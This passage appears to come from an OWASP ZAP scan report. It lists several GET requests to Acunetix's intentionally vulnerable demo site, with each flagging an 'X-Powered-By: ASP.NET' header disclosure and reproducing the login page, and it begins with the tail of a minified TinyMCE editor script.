h=img.style.height;if(h!=null&&h!="")img.setAttribute("height",h);}border=tinyMCE.getAttrib(img,'border');hspace=tinyMCE.getAttrib(img,'hspace');vspace=tinyMCE.getAttrib(img,'vspace');width=tinyMCE.getAttrib(img,'width');height=tinyMCE.getAttrib(img,'height');align=tinyMCE.getAttrib(img,'align');onmouseover=tinyMCE.getAttrib(img,'onmouseover');onmouseout=tinyMCE.getAttrib(img,'onmouseout');title=tinyMCE.getAttrib(img,'title');if(tinyMCE.isMSIE){width=img.attributes['width'].specified?width:"";height=img.attributes['height'].specified?height:"";}onmouseover=tinyMCE.getImageSrc(tinyMCE.cleanupEventStr(onmouseover));onmouseout=tinyMCE.getImageSrc(tinyMCE.cleanupEventStr(onmouseout));mceRealSrc=tinyMCE.getAttrib(img,'mce_real_src');if(mceRealSrc!="")src=mceRealSrc;src=eval(tinyMCE.settings['urlconverter_callback']+"(src, img, true);");if(onmouseover!="")onmouseover=eval(tinyMCE.settings['urlconverter_callback']+"(onmouseover, img, true);");if(onmouseout!="")onmouseout=eval(tinyMCE.settings['urlconverter_callback']+"(onmouseout, img, true);");action="update";}if(this.settings['insertimage_callback']){var returnVal=eval(this.settings['insertimage_callback']+"(src, alt, border, hspace, vspace, width, height, align, title, onmouseover, onmouseout, action);");if(returnVal&&returnVal['src'])tinyMCE.insertImage(returnVal['src'],returnVal['alt'],returnVal['border'],returnVal['hspace'],returnVal['vspace'],returnVal['width'],returnVal['height'],returnVal['align'],returnVal['title'],returnVal['onmouseover'],returnVal['onmouseout']);}else tinyMCE.openWindow(this.insertImageTemplate,{src:src,alt:alt,border:border,hspace:hspace,vspace:vspace,width:width,height:height,align:align,title:title,onmouseover:onmouseover,onmouseout:onmouseout,action:action});break;case "mceCleanup":tinyMCE._setHTML(this.contentDocument,this.getBody().innerHTML);tinyMCE.setInnerHTML(this.getBody(),tinyMCE._cleanupHTML(this,this.contentDocument,this.settings,this.getBody(),this.visualAid));tinyMCE.handleVisualAid(this.getBody(),true,this.visualAid,this);tinyMCE._setEventsEnabled(this.getBody(),false);this.repaint();tinyMCE.triggerNodeChange();break;case "mceReplaceContent":this.getWin().focus();var selectedText="";if(tinyMCE.isMSIE){var rng=doc.selection.createRange();selectedText=rng.text;}else selectedText=this.getSel().toString();if(selectedText.length>0){value=tinyMCE.replaceVar(value,"selection",selectedText);tinyMCE.execCommand('mceInsertContent',false,value);}tinyMCE.triggerNodeChange();break;case "mceSetAttribute":if(typeof(value)=='object'){var targetElms=(typeof(value['targets'])=="undefined")?"p,img,span,div,td,h1,h2,h3,h4,h5,h6,pre,address":value['targets'];var targetNode=tinyMCE.getParentElement(this.getFocusElement(),targetElms);if(targetNode){targetNode.setAttribute(value['name'],value['value']);tinyMCE.triggerNodeChange();}}break;case "mceSetCSSClass":this.execCommand("SetStyleInfo",false,{command:"setattrib",name:"class",value:value});break;case "mceInsertRawHTML":var key='tiny_mce_marker';this.execCommand('mceBeginUndoLevel');this.execCommand('mceInsertContent',false,key);var scrollX=this.getDoc().body.scrollLeft+this.getDoc().documentElement.scrollLeft;var scrollY=this.getDoc().body.scrollTop+this.getDoc().documentElement.scrollTop;var html=this.getBody().innerHTML;if((pos=html.indexOf(key))!=-1)tinyMCE.setInnerHTML(this.getBody(),html.substring(0,pos)+value+html.substring(pos+key.length));this.contentWindow.scrollTo(scrollX,scrollY);this.execCommand('mceEndUndoLevel');break;case "mceInsertContent":var insertHTMLFailed=false;this.getWin().focus();if(tinyMCE.isGecko||tinyMCE.isOpera){try{this.getDoc().execCommand('inserthtml',false,value);}catch(ex){insertHTMLFailed=true;}if(!insertHTMLFailed){tinyMCE.triggerNodeChange();return;}}if(tinyMCE.isOpera&&insertHTMLFailed){this.getDoc().execCommand("insertimage",false,tinyMCE.uniqueURL);var ar=tinyMCE.getElementsByAttributeValue(this.getBody(),"img","src",tinyMCE.uniqueURL);ar[0].outerHTML=value;return;}if(!tinyMCE.isMSIE){var isHTML=value.indexOf('<')!=-1;var sel=this.getSel();var rng=this.getRng();if(isHTML){if(tinyMCE.isSafari){var tmpRng=this.getDoc().createRange();tmpRng.setStart(this.getBody(),0);tmpRng.setEnd(this.getBody(),0);value=tmpRng.createContextualFragment(value);}else value=rng.createContextualFragment(value);}else{var el=document.createElement("div");el.innerHTML=value;value=el.firstChild.nodeValue;value=doc.createTextNode(value);}if(tinyMCE.isSafari&&!isHTML){this.execCommand('InsertText',false,value.nodeValue);tinyMCE.triggerNodeChange();return true;}else if(tinyMCE.isSafari&&isHTML){rng.deleteContents();rng.insertNode(value);tinyMCE.triggerNodeChange();return true;}rng.deleteContents();if(rng.startContainer.nodeType==3){var node=rng.startContainer.splitText(rng.startOffset);node.parentNode.insertBefore(value,node);}else rng.insertNode(value);if(!isHTML){sel.selectAllChildren(doc.body);sel.removeAllRanges();var rng=doc.createRange();rng.selectNode(value);rng.collapse(false);sel.addRange(rng);}else rng.collapse(false);}else{var rng=doc.selection.createRange();if(rng.item)rng.item(0).outerHTML=value;else rng.pasteHTML(value);}tinyMCE.triggerNodeChange();break;case "mceStartTyping":if(tinyMCE.settings['custom_undo_redo']&&this.typingUndoIndex==-1){this.typingUndoIndex=this.undoIndex;this.execCommand('mceAddUndoLevel');}break;case "mceEndTyping":if(tinyMCE.settings['custom_undo_redo']&&this.typingUndoIndex!=-1){this.execCommand('mceAddUndoLevel');this.typingUndoIndex=-1;}break;case "mceBeginUndoLevel":this.undoRedo=false;break;case "mceEndUndoLevel":this.undoRedo=true;this.execCommand('mceAddUndoLevel');break;case "mceAddUndoLevel":if(tinyMCE.settings['custom_undo_redo']&&this.undoRedo){if(this.typingUndoIndex!=-1){this.undoIndex=this.typingUndoIndex;}var newHTML=tinyMCE.trim(this.getBody().innerHTML);if(newHTML!=this.undoLevels[this.undoIndex]){tinyMCE.executeCallback('onchange_callback','_onchange',0,this);var customUndoLevels=tinyMCE.settings['custom_undo_redo_levels'];if(customUndoLevels!=-1&&this.undoLevels.length>customUndoLevels){for(var i=0;i<this.undoLevels.length-1;i++){this.undoLevels[i]=this.undoLevels[i+1];}this.undoLevels.length--;this.undoIndex--;}this.undoIndex++;this.undoLevels[this.undoIndex]=newHTML;this.undoLevels.length=this.undoIndex+1;tinyMCE.triggerNodeChange(false);}}break;case "Undo":if(tinyMCE.settings['custom_undo_redo']){tinyMCE.execCommand("mceEndTyping");if(this.undoIndex>0){this.undoIndex--;tinyMCE.setInnerHTML(this.getBody(),this.undoLevels[this.undoIndex]);this.repaint();}tinyMCE.triggerNodeChange();}else this.getDoc().execCommand(command,user_interface,value);break;case "Redo":if(tinyMCE.settings['custom_undo_redo']){tinyMCE.execCommand("mceEndTyping");if(this.undoIndex<(this.undoLevels.length-1)){this.undoIndex++;tinyMCE.setInnerHTML(this.getBody(),this.undoLevels[this.undoIndex]);this.repaint();}tinyMCE.triggerNodeChange();}else this.getDoc().execCommand(command,user_interface,value);break;case "mceToggleVisualAid":this.visualAid=!this.visualAid;tinyMCE.handleVisualAid(this.getBody(),true,this.visualAid,this);tinyMCE.triggerNodeChange();break;case "Indent":this.getDoc().execCommand(command,user_interface,value);tinyMCE.triggerNodeChange();if(tinyMCE.isMSIE){var n=tinyMCE.getParentElement(this.getFocusElement(),"blockquote");do{if(n&&n.nodeName=="BLOCKQUOTE"){n.removeAttribute("dir");n.removeAttribute("style");}}while(n!=null&&(n=n.parentNode)!=null);}break;case "removeformat":var text=this.getSelectedText();if(tinyMCE.isOpera){this.getDoc().execCommand("RemoveFormat",false,null);return;}if(tinyMCE.isMSIE){try{var rng=doc.selection.createRange();rng.execCommand("RemoveFormat",false,null);}catch(e){}this.execCommand("SetStyleInfo",false,{command:"removeformat"});}else{this.getDoc().execCommand(command,user_interface,value);this.execCommand("SetStyleInfo",false,{command:"removeformat"});}if(text.length==0)this.execCommand("mceSetCSSClass",false,"");tinyMCE.triggerNodeChange();break;default:this.getDoc().execCommand(command,user_interface,value);if(tinyMCE.isGecko)window.setTimeout('tinyMCE.triggerNodeChange(false);',1);else tinyMCE.triggerNodeChange();}if(command!="mceAddUndoLevel"&&command!="Undo"&&command!="Redo"&&command!="mceStartTyping"&&command!="mceEndTyping")tinyMCE.execCommand("mceAddUndoLevel");};TinyMCEControl.prototype.queryCommandValue=function(command){return this.getDoc().queryCommandValue(command);};TinyMCEControl.prototype.queryCommandState=function(command){return this.getDoc().queryCommandState(command);};TinyMCEControl.prototype.onAdd=function(replace_element,form_element_name,target_document){var targetDoc=target_document?target_document:document;this.targetDoc=targetDoc;tinyMCE.themeURL=tinyMCE.baseURL+"/themes/"+this.settings['theme'];this.settings['themeurl']=tinyMCE.themeURL;if(!replace_element){alert("Error: Could not find the target element.");return false;}var templateFunction=tinyMCE._getThemeFunction('_getInsertLinkTemplate');if(eval("typeof("+templateFunction+")")!='undefined')this.insertLinkTemplate=eval(templateFunction+'(this.settings);');var templateFunction=tinyMCE._getThemeFunction('_getInsertImageTemplate');if(eval("typeof("+templateFunction+")")!='undefined')this.insertImageTemplate=eval(templateFunction+'(this.settings);');var templateFunction=tinyMCE._getThemeFunction('_getEditorTemplate');if(eval("typeof("+templateFunction+")")=='undefined'){alert("Error: Could not find the template function: "+templateFunction);return false;}var editorTemplate=eval(templateFunction+'(this.settings, this.editorId);');var deltaWidth=editorTemplate['delta_width']?editorTemplate['delta_width']:0;var deltaHeight=editorTemplate['delta_height']?editorTemplate['delta_height']:0;var html='<span id="'+this.editorId+'_parent">'+editorTemplate['html'];var templateFunction=tinyMCE._getThemeFunction('_handleNodeChange',true);if(eval("typeof("+templateFunction+")")!='undefined')this.settings['handleNodeChangeCallback']=templateFunction;html=tinyMCE.replaceVar(html,"editor_id",this.editorId);this.settings['default_document']=tinyMCE.baseURL+"/blank.htm";this.settings['old_width']=this.settings['width'];this.settings['old_height']=this.settings['height'];if(this.settings['width']==-1)this.settings['width']=replace_element.offsetWidth;if(this.settings['height']==-1)this.settings['height']=replace_element.offsetHeight;if(this.settings['width']==0)this.settings['width']=replace_element.style.width;if(this.settings['height']==0)this.settings['height']=replace_element.style.height;if(this.settings['width']==0)this.settings['width']=320;if(this.settings['height']==0)this.settings['height']=240;this.settings['area_width']=parseInt(this.settings['width']);this.settings['area_height']=parseInt(this.settings['height']);this.settings['area_width']+=deltaWidth;this.settings['area_height']+=deltaHeight;if((""+this.settings['width']).indexOf('%')!=-1)this.settings['area_width']="100%";if((""+this.settings['height']).indexOf('%')!=-1)this.settings['area_height']="100%";if((""+replace_element.style.width).indexOf('%')!=-1){this.settings['width']=replace_element.style.width;this.settings['area_width']="100%";}if((""+replace_element.style.height).indexOf('%')!=-1){this.settings['height']=replace_element.style.height;this.settings['area_height']="100%";}html=tinyMCE.applyTemplate(html);this.settings['width']=this.settings['old_width'];this.settings['height']=this.settings['old_height'];this.visualAid=this.settings['visual'];this.formTargetElementId=form_element_name;if(replace_element.nodeName=="TEXTAREA"||replace_element.nodeName=="INPUT")this.startContent=replace_element.value;else this.startContent=replace_element.innerHTML;if(replace_element.nodeName.toLowerCase()!="textarea"){this.oldTargetElement=replace_element.cloneNode(true);if(tinyMCE.settings['debug'])html+='<textarea wrap="off" id="'+form_element_name+'" name="'+form_element_name+'" cols="100" rows="15"></textarea>';else html+='<input type="hidden" type="text" id="'+form_element_name+'" name="'+form_element_name+'" />';html+='</span>';if(!tinyMCE.isMSIE){var rng=replace_element.ownerDocument.createRange();rng.setStartBefore(replace_element);var fragment=rng.createContextualFragment(html);replace_element.parentNode.replaceChild(fragment,replace_element);}else replace_element.outerHTML=html;}else{html+='</span>';this.oldTargetElement=replace_element;if(!tinyMCE.settings['debug'])this.oldTargetElement.style.display="none";if(!tinyMCE.isMSIE){var rng=replace_element.ownerDocument.createRange();rng.setStartBefore(replace_element);var fragment=rng.createContextualFragment(html);replace_element.parentNode.insertBefore(fragment,replace_element);}else replace_element.insertAdjacentHTML("beforeBegin",html);}var dynamicIFrame=false;var tElm=targetDoc.getElementById(this.editorId);if(!tinyMCE.isMSIE){if(tElm&&tElm.nodeName.toLowerCase()=="span"){tElm=tinyMCE._createIFrame(tElm);dynamicIFrame=true;}this.targetElement=tElm;this.iframeElement=tElm;this.contentDocument=tElm.contentDocument;this.contentWindow=tElm.contentWindow;}else{if(tElm&&tElm.nodeName.toLowerCase()=="span")tElm=tinyMCE._createIFrame(tElm);else tElm=targetDoc.frames[this.editorId];this.targetElement=tElm;this.iframeElement=targetDoc.getElementById(this.editorId);if(tinyMCE.isOpera){this.contentDocument=this.iframeElement.contentDocument;this.contentWindow=this.iframeElement.contentWindow;dynamicIFrame=true;}else{this.contentDocument=tElm.window.document;this.contentWindow=tElm.window;}this.getDoc().designMode="on";}var doc=this.contentDocument;if(dynamicIFrame){var html=tinyMCE.getParam('doctype')+'<html><head xmlns="http://www.w3.org/1999/xhtml"><base href="'+tinyMCE.settings['base_href']+'" /><title>blank_page</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"></head><body class="mceContentBody"></body></html>';try{this.getDoc().designMode="on";doc.open();doc.write(html);doc.close();}catch(e){this.getDoc().location.href=tinyMCE.baseURL+"/blank.htm";}}if(tinyMCE.isMSIE)window.setTimeout("TinyMCE.prototype.addEventHandlers('"+this.editorId+"');",1);tinyMCE.setupContent(this.editorId,true);return true;};TinyMCEControl.prototype.getFocusElement=function(){if(tinyMCE.isMSIE&&!tinyMCE.isOpera){var doc=this.getDoc();var rng=doc.selection.createRange();var elm=rng.item?rng.item(0):rng.parentElement();}else{var sel=this.getSel();var rng=this.getRng();var elm=rng.commonAncestorContainer;if(!rng.collapsed){if(rng.startContainer==rng.endContainer){if(rng.startOffset-rng.endOffset<2){if(rng.startContainer.hasChildNodes())elm=rng.startContainer.childNodes[rng.startOffset];}}}elm=tinyMCE.getParentElement(elm);}return elm;};var tinyMCE=new TinyMCE();var tinyMCELang=new Array(); |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2FDefault%2Easp%3F |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 334 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2FDefault%2Easp%3F HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:22 GMT Content-Length: 3198 |
| Response Body - size: 3,198 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FDefault%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FDefault%2Easp%3F" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3F |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 344 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3F HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Search.asp Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:24 GMT Content-Length: 3196 |
| Response Body - size: 3,196 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FSearch%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FSearch%2Easp%3F" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 371 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Search.asp?tfSearch=ZAP Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:33 GMT Content-Length: 3137 |
| Response Body - size: 3,137 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 361 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:25 GMT Content-Length: 3132 |
| Response Body - size: 3,132 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 361 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=1 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:29 GMT Content-Length: 3132 |
| Response Body - size: 3,132 bytes. |
